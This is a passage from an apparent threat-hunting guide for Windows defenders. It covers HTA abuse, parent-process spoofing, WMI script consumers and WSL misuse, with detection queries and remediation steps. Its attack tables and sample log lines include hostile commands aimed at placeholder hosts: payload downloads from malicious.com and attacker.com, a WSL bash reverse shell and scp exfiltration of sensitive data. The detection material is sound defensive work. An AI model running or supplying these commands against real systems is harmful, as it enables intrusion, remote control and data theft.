ProcessCommandLine: powershell.exe -c "Invoke-WebRequest -Uri http://malicious.com/payload.exe" ProcessCommandLine: cmd.exe /c "curl http://malicious.com/file"
π Focus on Event ID 5156:
Check for network connections to external IPs:
RemoteIP: 45.67.89.123 RemotePort: 443
π΅οΈ 3. Investigation Techniques
1οΈβ£ Trace Network Connections
netstat -ano | findstr :802οΈβ£ Inspect Process Trees
Get-CimInstance Win32_Process | Where-Object { $_.ParentProcessId -eq <PID> }3οΈβ£ Analyze DNS Queries
Check logs for unusual DNS queries:
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-DNS-Client/Operational'}π§ 4. Remediation Steps
π 1. Terminate Malicious Processes
Stop-Process -Id <PID> -Forceπ 2. Block Malicious IPs and Domains
New-NetFirewallRule -DisplayName "Block Malicious IP" -Direction Outbound -RemoteAddress <IP> -Action Blockπ 3. Remove Malicious Scripts
Remove-Item -Path "C:\Temp\script.ps1" -Forceπ 4. Clear DNS Cache
Clear-DnsClientCacheπ 5. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScanπ‘οΈ 5. Prevention Steps
Monitor Suspicious Network Connections.
Restrict Script Execution with AppLocker.
Enable DNS Logging and Monitoring.
Limit Outbound Traffic to Trusted Domains.
Apply Least Privilege Principles.
π§ 6. Key Takeaways
Network Payloads are Stealthy: Focus on HTTP/S, DNS, and external IPs.
Monitor Event IDs: 4688, 5156, 4663, 4104.
Track Parent-Child Processes: Especially involving scripts.
π¨ HTA File Created
π 1. Attack Breakdown
π What is an HTA File?
HTA (HTML Application) files are executable HTML files processed by
mshta.exe, a legitimate Windows binary.HTA files allow execution of VBScript, JavaScript, or embedded executable code.
Attackers use HTA files for:
Initial Access: Spear phishing or malicious downloads.
Execution Proxy: Running scripts without restrictions.
Persistence: Scheduled tasks or startup entries.
Defense Evasion: Masking malicious intent in seemingly benign HTML code.
π Why Do Attackers Use HTA Files?
Trusted Binary:
mshta.exeis signed by Microsoft.Execution Flexibility: Runs VBScript, JavaScript, and embedded payloads.
Low Detection Rate: Often bypasses antivirus and endpoint defenses.
Fileless Attack: Can execute directly from memory.
Remote Execution: Supports execution via URLs.
π Common Attack Scenarios
Technique
Description
Example Command
HTA via Email Attachment
Malicious HTA file attached in phishing emails.
malware.hta
HTA via URL Delivery
Hosted on attacker-controlled domains.
mshta.exe http://attacker.com/payload.hta
Fileless Execution
HTA file executed directly from memory.
mshta.exe vbscript:Execute("malicious code")
HTA Dropper
HTA file drops and executes additional payloads.
mshta.exe %TEMP%\malware.hta
Persistence via Scheduled Task
HTA used in scheduled tasks.
schtasks /create /tn "Updater" /tr "mshta.exe payload.hta" /sc daily
π‘οΈ 2. Detection Techniques
π Manual Inspection with PowerShell
π΅οΈ Search for Recently Created HTA Files
Get-ChildItem -Path "C:\Users\", "C:\Windows\Temp", "C:\ProgramData" -Filter "*.hta" -Recurse |
Where-Object { $_.LastWriteTime -gt (Get-Date).AddHours(-24) } |
Select-Object FullName, LastWriteTimeπ΅οΈ Inspect HTA File Contents
Get-Content -Path "C:\Path\to\file.hta"π΅οΈ List Processes Executing HTA Files
Get-Process -Name mshta | Select-Object Id, ProcessName, Path, StartTimeπ΅οΈ Check Parent-Child Process Relationship
Get-CimInstance Win32_Process | Where-Object { $_.Name -eq "mshta.exe" } |
Select-Object ProcessId, ParentProcessId, CommandLineπ΅οΈ Identify Suspicious Scheduled Tasks
schtasks /query /fo LIST /v | findstr "mshta.exe"π Microsoft Defender for Endpoint (MDE) Query (KQL)
π΅οΈ Detect HTA File Creation
DeviceFileEvents
| where FileName endswith ".hta"
| where FolderPath contains "Temp" or FolderPath contains "Downloads"
| project Timestamp, DeviceName, FileName, FolderPath, AccountNameπ΅οΈ Monitor HTA Execution
DeviceProcessEvents
| where FileName == "mshta.exe"
| where ProcessCommandLine contains ".hta" or ProcessCommandLine contains "http"
| project Timestamp, DeviceName, ProcessCommandLine, ParentProcessName, AccountNameπ΅οΈ Identify HTA File Delivered via Web
DeviceNetworkEvents
| where InitiatingProcessFileName == "mshta.exe"
| where RemoteUrl contains ".hta"
| project Timestamp, DeviceName, RemoteUrl, ProcessCommandLine, AccountNameπ΅οΈ Trace HTA Activity via Scheduled Tasks
DeviceProcessEvents
| where ProcessCommandLine contains "schtasks"
| where ProcessCommandLine contains "mshta.exe"
| project Timestamp, DeviceName, ProcessCommandLine, AccountNameπ΅οΈ Find Obfuscated HTA Commands
DeviceProcessEvents
| where FileName == "mshta.exe"
| where ProcessCommandLine contains "vbscript" or ProcessCommandLine contains "Execute"
| project Timestamp, DeviceName, ProcessCommandLine, AccountNameπ Event Viewer Logs
Event ID
Description
4688
A new process was created (e.g., mshta.exe).
4663
Object access attempt (e.g., HTA file access).
4104
PowerShell script block execution.
7045
A new service was installed on the system.
π Focus on Event ID 4688:
Look for:
ProcessCommandLine: mshta.exe C:\Users\User\Downloads\malicious.hta ProcessCommandLine: mshta.exe http://attacker.com/payload.hta
π Focus on Event ID 4663:
Object access to
.htafiles:FileName: malicious.hta
π΅οΈ 3. Investigation Techniques
1οΈβ£ Analyze HTA File Contents
Review HTA file for suspicious code:
Get-Content -Path "C:\Users\User\Downloads\malicious.hta"2οΈβ£ Trace HTA Network Activity
Identify external connections made by HTA:
netstat -ano | findstr <PID>3οΈβ£ Review Parent Process
Trace the process tree:
Get-CimInstance Win32_Process | Where-Object { $_.ParentProcessId -eq <PID> }4οΈβ£ Check for Persistence
Review scheduled tasks or startup entries:
schtasks /query /fo LIST /vπ§ 4. Remediation Steps
π 1. Terminate Malicious Processes
Stop-Process -Name "mshta" -Forceπ 2. Delete Malicious HTA Files
Remove-Item -Path "C:\Users\User\Downloads\malicious.hta" -Forceπ 3. Audit Scheduled Tasks
schtasks /delete /tn "UpdaterTask" /fπ 4. Block HTA Execution
Disable HTA files in Windows:
reg add "HKCU\Software\Microsoft\Windows Script Host\Settings" /v Enabled /t REG_DWORD /d 0 /fπ 5. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScanπ‘οΈ 5. Prevention Steps
Disable HTA Execution via GPO:
Prevent
mshta.exefrom running.
Monitor HTA File Creations:
Regularly review
DownloadsandTempdirectories.
Enable Process Command-Line Auditing:
Track
mshta.exeexecutions.
Restrict Scheduled Task Execution:
Limit user permissions for task creation.
Educate Users:
Warn against executing unknown HTA files.
π¨ Spoofed Privileged Parent Process Detected
π 1. Attack Breakdown
π What is a Spoofed Privileged Parent Process?
A Spoofed Privileged Parent Process occurs when an attacker creates a child process under a highly privileged parent process (e.g.,
lsass.exe,explorer.exe,services.exe) to:Execute malicious payloads.
Bypass security policies.
Gain elevated privileges.
Evade detection by masquerading as legitimate activity.
π Why Attackers Use Privileged Parent Process Spoofing?
Stealth: Malicious processes blend in with legitimate ones.
Privilege Escalation: Gain SYSTEM or ADMIN privileges.
Evasion: Security tools may trust child processes of known legitimate parent processes.
Execution Proxy: Launch malicious code under trusted processes.
Persistence: Embed malicious activities in long-lived processes.
π Common Attack Scenarios
Technique
Description
Example Command
Process Injection
Inject payloads into a privileged parent process.
rundll32.exe inject.dll
Parent PID Spoofing
Manually set a process's parent PID.
CreateProcessWithParentPID
Windows API Abuse
Use APIs like CreateRemoteThread.
CreateRemoteThread(ProcessId)
Reflective DLL Injection
Inject malicious DLLs into privileged processes.
powershell.exe -exec bypass Invoke-ReflectiveDLLInjection
CMD/Powershell via Trusted Process
Execute malicious commands under trusted processes.
cmd.exe /c malicious.bat
π‘οΈ 2. Detection Techniques
π Manual Inspection with PowerShell
π΅οΈ List Suspicious Parent-Child Relationships
Get-CimInstance Win32_Process | Where-Object {
$_.ParentProcessId -in (Get-Process -Name "lsass", "explorer", "services").Id
} | Select-Object ProcessId, ParentProcessId, Name, CommandLineπ΅οΈ Identify Processes with Abnormal Parent-Child Pairings
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | Where-Object {
$_.Message -like "*ParentProcessName: *lsass.exe*" -or $_.Message -like "*ParentProcessName: *services.exe*"
}π΅οΈ Inspect Processes with Elevated Privileges
Get-Process | Where-Object { $_.Path -like "*Temp*" -or $_.Path -like "*AppData*" }π΅οΈ Check Loaded Modules in Suspicious Processes
Get-Process -Id <PID> -Module | Where-Object { $_.ModuleName -like "*.dll" }π Microsoft Defender for Endpoint (MDE) Query (KQL)
π΅οΈ Detect Suspicious Parent-Child Process Relationships
DeviceProcessEvents
| where ParentProcessFileName in ("lsass.exe", "services.exe", "explorer.exe")
| where ProcessCommandLine contains "cmd.exe" or ProcessCommandLine contains "powershell.exe"
| project Timestamp, DeviceName, ProcessCommandLine, ParentProcessName, AccountNameπ΅οΈ Identify Processes Running from Suspicious Directories
DeviceProcessEvents
| where FolderPath contains "Temp" or FolderPath contains "AppData"
| where ParentProcessFileName in ("lsass.exe", "services.exe")
| project Timestamp, DeviceName, FolderPath, ProcessCommandLine, AccountNameπ΅οΈ Detect Process Injection Activity
DeviceProcessEvents
| where ProcessCommandLine contains "CreateRemoteThread"
| where ParentProcessFileName in ("lsass.exe", "services.exe")
| project Timestamp, DeviceName, ProcessCommandLine, AccountNameπ΅οΈ Monitor Abnormal Child Processes of Privileged Parents
DeviceProcessEvents
| where ParentProcessFileName in ("lsass.exe", "services.exe", "explorer.exe")
| where FileName in ("cmd.exe", "powershell.exe")
| project Timestamp, DeviceName, FileName, ParentProcessName, AccountNameπ Event Viewer Logs
Event ID
Description
4688
A new process was created (e.g., cmd.exe, powershell.exe).
4663
Object access attempt.
4656
Handle to an object was requested.
7045
A new service was installed.
π Focus on Event ID 4688:
Look for:
ParentProcessName: lsass.exe CommandLine: cmd.exe /c payload.bat
π Focus on Event ID 7045:
New service installations by suspicious parent processes:
ServiceName: MaliciousService
π΅οΈ 3. Investigation Techniques
1οΈβ£ Trace Parent Process Anomalies
Get-CimInstance Win32_Process | Where-Object { $_.ParentProcessId -eq <PID> }2οΈβ£ Inspect DLLs Loaded in Suspicious Processes
Get-Process -Id <PID> -Module | Where-Object { $_.ModuleName -like "*.dll" }3οΈβ£ Inspect Temporary Directories for Scripts or Payloads
Get-ChildItem -Path "C:\Windows\Temp", "C:\Users\Public" -Include *.exe, *.bat, *.ps1π§ 4. Remediation Steps
π 1. Terminate Malicious Processes
Stop-Process -Id <PID> -Forceπ 2. Quarantine Suspicious Payloads
Move-Item -Path "C:\Windows\Temp\malicious.exe" -Destination "C:\Quarantine"π 3. Audit Scheduled Tasks
schtasks /query /fo LIST /vπ 4. Remove Malicious Registry Entries
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "MaliciousEntry"π 5. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScanπ‘οΈ 5. Prevention Steps
Monitor Privileged Parent Processes:
Audit child processes under
lsass.exe,services.exe,explorer.exe.
Implement Process Integrity Policies:
Use Windows Defender Application Control (WDAC).
Enable Command Line Auditing:
Capture arguments of processes launched by privileged parents.
Restrict Access to Sensitive APIs:
Prevent unauthorized
CreateRemoteThreadcalls.
Educate Security Teams:
Ensure analysts understand privileged parent process abuse.
π§ 6. Key Takeaways
Focus on Event IDs: 4688, 4663, 7045.
Monitor Process Hierarchies: Validate child processes of privileged parents.
Investigate Anomalies in Temporary Directories: Payloads often reside in
TemporAppData.Apply Least Privilege Principle: Prevent unnecessary elevated access.
π¨ Suspicious WMI Process: Active Script Event Consumer
π 1. Attack Breakdown
π What is an Active Script Event Consumer?
Windows Management Instrumentation (WMI) is a powerful system management framework used for monitoring, querying, and automation in Windows environments.
Active Script Event Consumers allow WMI to execute VBScript or JScript when specific conditions (WMI events) are met.
Attackers abuse WMI Active Script Event Consumers to:
Establish Persistence: Trigger scripts automatically on system events.
Execute Payloads Silently: Run scripts without dropping files on disk.
Evade Detection: Use native Windows tools, bypassing many security solutions.
π Why Attackers Use WMI Active Script Event Consumers?
Fileless Persistence: No files are dropped on disk.
Stealth: Native Windows tools are trusted by antivirus solutions.
Automated Execution: Execute malicious scripts on specific triggers.
Wide Reach: WMI is accessible across the network.
Flexibility: Supports VBScript, JScript, and Powershell execution.
π Common Attack Scenarios
Technique
Description
Example Command
Persistence via Event Consumers
Trigger malicious VBScript on a system event.
wmic /namespace:\\root\subscription PATH __EventConsumer CREATE
Script Execution via WMI
Use WMI to run a payload.
wmic /namespace:\\root\subscription PATH CommandLineEventConsumer
Scheduled Task via WMI
WMI triggers a payload at a specific time.
powershell.exe -c "Invoke-WebRequest -Uri http://malicious.com/payload.ps1"
Remote WMI Execution
Use WMI to execute payloads remotely.
wmic /node:<remote-host> process call create "cmd.exe /c payload.exe"
Obfuscated VBScript in WMI Consumer
Obfuscated payload in VBScript.
wmic /namespace:\\root\subscription PATH ActiveScriptEventConsumer
π‘οΈ 2. Detection Techniques
π Manual Inspection with PowerShell
π΅οΈ List All WMI Event Consumers
Get-WmiObject -Namespace root\subscription -Class __EventConsumerπ΅οΈ Search for Active Script Event Consumers
Get-WmiObject -Namespace root\subscription -Class ActiveScriptEventConsumer | Select-Object Name, ScriptTextπ΅οΈ Check for Command Line Event Consumers
Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer | Select-Object Name, CommandLineTemplateπ΅οΈ Identify Suspicious Scripts in WMI
Get-WmiObject -Namespace root\subscription -Class ActiveScriptEventConsumer |
Where-Object { $_.ScriptText -match "cmd|powershell|Invoke-WebRequest" }π΅οΈ Monitor Recent WMI Events
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-WMI-Activity/Operational'; Id=5857}π Microsoft Defender for Endpoint (MDE) Query (KQL)
π΅οΈ Detect Active Script Event Consumers
DeviceProcessEvents
| where FileName == "wmic.exe" or FileName == "powershell.exe"
| where ProcessCommandLine contains "EventConsumer" or ProcessCommandLine contains "ActiveScriptEventConsumer"
| project Timestamp, DeviceName, ProcessCommandLine, AccountNameπ΅οΈ Identify Suspicious WMI Commands
DeviceProcessEvents
| where FileName == "wmic.exe"
| where ProcessCommandLine contains "namespace:\\root\subscription"
| where ProcessCommandLine contains "EventConsumer"
| project Timestamp, DeviceName, ProcessCommandLine, AccountNameπ΅οΈ Trace Event Consumers with Suspicious Script Content
DeviceProcessEvents
| where ProcessCommandLine contains "ScriptText"
| where ProcessCommandLine contains "cmd" or ProcessCommandLine contains "powershell"
| project Timestamp, DeviceName, ProcessCommandLine, AccountNameπ΅οΈ Monitor Remote WMI Execution
DeviceProcessEvents
| where ProcessCommandLine contains "wmic /node:"
| where ProcessCommandLine contains "process call create"
| project Timestamp, DeviceName, ProcessCommandLine, AccountNameπ΅οΈ Detect Script-Based WMI Consumers
DeviceProcessEvents
| where ProcessCommandLine contains "ActiveScriptEventConsumer"
| where ProcessCommandLine contains "vbscript" or ProcessCommandLine contains "jscript"
| project Timestamp, DeviceName, ProcessCommandLine, AccountNameπ Event Viewer Logs
Event ID
Description
4688
A new process was created (e.g., wmic.exe).
5857
WMI Consumer Process detected.
4663
Object access attempt.
4104
PowerShell script block execution.
π Focus on Event ID 5857:
Look for:
ConsumerName: ActiveScriptEventConsumer ScriptText: powershell.exe -EncodedCommand
π Focus on Event ID 4688:
Trace processes related to WMI Event Consumers:
ProcessCommandLine: wmic /namespace:\\root\subscription
π΅οΈ 3. Investigation Techniques
1οΈβ£ Review Active WMI Consumers
Inspect WMI Consumer activity:
Get-WmiObject -Namespace root\subscription -Class __EventConsumer2οΈβ£ Analyze EventConsumer Scripts
Extract script content:
Get-WmiObject -Namespace root\subscription -Class ActiveScriptEventConsumer | Select-Object Name, ScriptText3οΈβ£ Inspect Remote WMI Execution
Identify WMI execution across systems:
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688}π§ 4. Remediation Steps
π 1. Remove Suspicious WMI Event Consumers
Get-WmiObject -Namespace root\subscription -Class ActiveScriptEventConsumer | Remove-WmiObjectπ 2. Disable WMI Service (if not in use)
Stop-Service -Name Winmgmt -Force
Set-Service -Name Winmgmt -StartupType Disabledπ 3. Audit WMI Access Permissions
Get-WmiObject -Namespace root\subscription -Class __EventConsumer | Select-Object Name, SecurityDescriptorπ 4. Block Malicious Scripts
Remove-Item -Path "C:\Windows\Temp\malicious.ps1"π 5. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScanπ‘οΈ 5. Prevention Steps
Enable WMI Auditing.
Monitor WMI Event Consumers Regularly.
Restrict Administrative WMI Access.
Disable Unnecessary WMI Namespaces.
Apply Least Privilege Principle.
π§ 6. Key Takeaways
Focus on WMI Event IDs: 5857, 4688, 4663.
Monitor Script Text in Consumers: Look for VBScript, JScript, and PowerShell usage.
Restrict WMI Access: Apply strict permissions.
π¨ First Time Seen WSL Process Running on Machine: Advanced Threat Analysis
π **1. Attack Breakdown
π What is WSL?
Windows Subsystem for Linux (WSL) allows users to run a Linux environment directly on Windows, without requiring a virtual machine or dual-boot setup.
WSL can execute Linux commands, scripts, and binaries directly from Windows.
π Why Attackers Exploit WSL?
Living Off the Land (LotL): Use trusted system components for malicious purposes.
Stealth: Many endpoint solutions may not effectively monitor WSL processes.
Fileless Execution: Malicious payloads can run directly in memory.
Cross-Platform Attacks: Ability to use Linux tools on Windows.
Bypass Security Controls: WSL processes may evade detection policies.
π Common Attack Scenarios
Technique
Description
Example Command
WSL Reverse Shell
Establish a reverse shell using WSL.
wsl bash -c "bash -i >& /dev/tcp/attacker_ip/4444 0>&1"
WSL Malware Execution
Run malicious binaries using WSL.
wsl /mnt/c/temp/malware.sh
Fileless Malware
Download and execute payloads directly from WSL.
`wsl curl http://attacker.com/script.sh
Persistence via WSL Cron
Set up persistent tasks via Linux cron jobs.
wsl crontab -e
Data Exfiltration via WSL
Use WSL tools for stealthy data exfiltration.
wsl scp /mnt/c/sensitive_data.txt attacker@attacker.com:/loot
π‘οΈ 2. Detection Techniques
π Manual Inspection with PowerShell
π΅οΈ List WSL Processes Running on Windows
Get-Process -Name "wsl"π΅οΈ Check WSL Execution History in Windows Event Logs
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | Where-Object { $_.Message -like "*wsl.exe*" }π΅οΈ Identify Recent WSL Commands Executed
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-WinRM/Operational'} | Where-Object { $_.Message -like "*wsl*" }π΅οΈ Look for WSL-Related Processes Launching Windows Commands
Get-CimInstance Win32_Process | Where-Object { $_.Name -eq "wsl.exe" } | Select-Object ProcessId, CommandLineπ΅οΈ Trace Parent-Child Process Relationship
Get-CimInstance Win32_Process | Where-Object { $_.ParentProcessId -eq (Get-Process -Name "wsl").Id }π Microsoft Defender for Endpoint (MDE) Query (KQL)
π΅οΈ Detect First-Time WSL Process Execution
DeviceProcessEvents
| where FileName == "wsl.exe"
| summarize FirstSeen=min(Timestamp) by DeviceName, FileName
| project DeviceName, FileName, FirstSeenπ΅οΈ Monitor Suspicious WSL Commands
DeviceProcessEvents
| where FileName == "wsl.exe"
| where ProcessCommandLine contains "curl" or ProcessCommandLine contains "wget"
| project Timestamp, DeviceName, ProcessCommandLine, AccountNameπ΅οΈ Trace WSL Network Connections
DeviceNetworkEvents
| where InitiatingProcessFileName == "wsl.exe"
| project Timestamp, DeviceName, RemoteIP, RemoteUrl, RemotePort, ProcessCommandLineπ΅οΈ Detect WSL Accessing Suspicious Files
DeviceFileEvents
| where FileName contains "wsl"
| where FolderPath contains "Temp" or FolderPath contains "Public"
| project Timestamp, DeviceName, FileName, FolderPath, AccountNameπ΅οΈ Identify Privileged Commands Executed via WSL
DeviceProcessEvents
| where FileName == "wsl.exe"
| where ProcessCommandLine contains "chmod" or ProcessCommandLine contains "sudo"
| project Timestamp, DeviceName, ProcessCommandLine, AccountNameπ Event Viewer Logs
Event ID
Description
4688
A new process was created (wsl.exe).
4663
An attempt was made to access an object (e.g., files accessed via WSL).
5156
A network connection was allowed (trace WSL-originating traffic).
4104
PowerShell script block execution (if WSL is invoked via PowerShell).
π Focus on Event ID 4688:
Look for:
ProcessCommandLine: wsl.exe -e bash -c "wget http://attacker.com/payload.sh" ParentProcessName: explorer.exe
π Focus on Event ID 5156:
Network activity:
RemoteIP: 45.67.89.123 RemotePort: 443
π΅οΈ 3. Investigation Techniques
1οΈβ£ Analyze WSL Processes
Inspect currently running WSL processes:
Get-Process -Name "wsl"2οΈβ£ Trace Network Activity from WSL
Check active network connections:
netstat -ano | findstr <PID>3οΈβ£ Inspect File Access via WSL
Look for recently modified files:
Get-ChildItem -Path "C:\Windows\Temp", "C:\Users\Public" -Recurseπ§ 4. Remediation Steps
π 1. Terminate Malicious WSL Processes
Stop-Process -Name "wsl" -Forceπ 2. Disable WSL (if unused)
Disable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linuxπ 3. Audit User Permissions
Verify only authorized users can run WSL.
π 4. Block Suspicious IPs
New-NetFirewallRule -DisplayName "Block Suspicious IP" -Direction Outbound -RemoteAddress <IP> -Action Blockπ 5. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScanπ‘οΈ 5. Prevention Steps
Enable Logging for WSL:
Monitor all WSL-related events.
Restrict WSL Installation:
Allow installation only for specific accounts.
Monitor Network Connections:
Identify external communication from WSL.
Regular Auditing:
Check Event IDs 4688, 4663, 5156 frequently.
Limit Execution of Sudo Commands:
Enforce least privilege principles.
π§ 6. Key Takeaways
First-Time WSL Execution: Could indicate suspicious activity.
Focus on Event IDs: 4688, 4663, 5156.
Trace Network Connections: Look for outbound communication.
Monitor Script Execution: Pay attention to WSL launching external scripts.
Last updated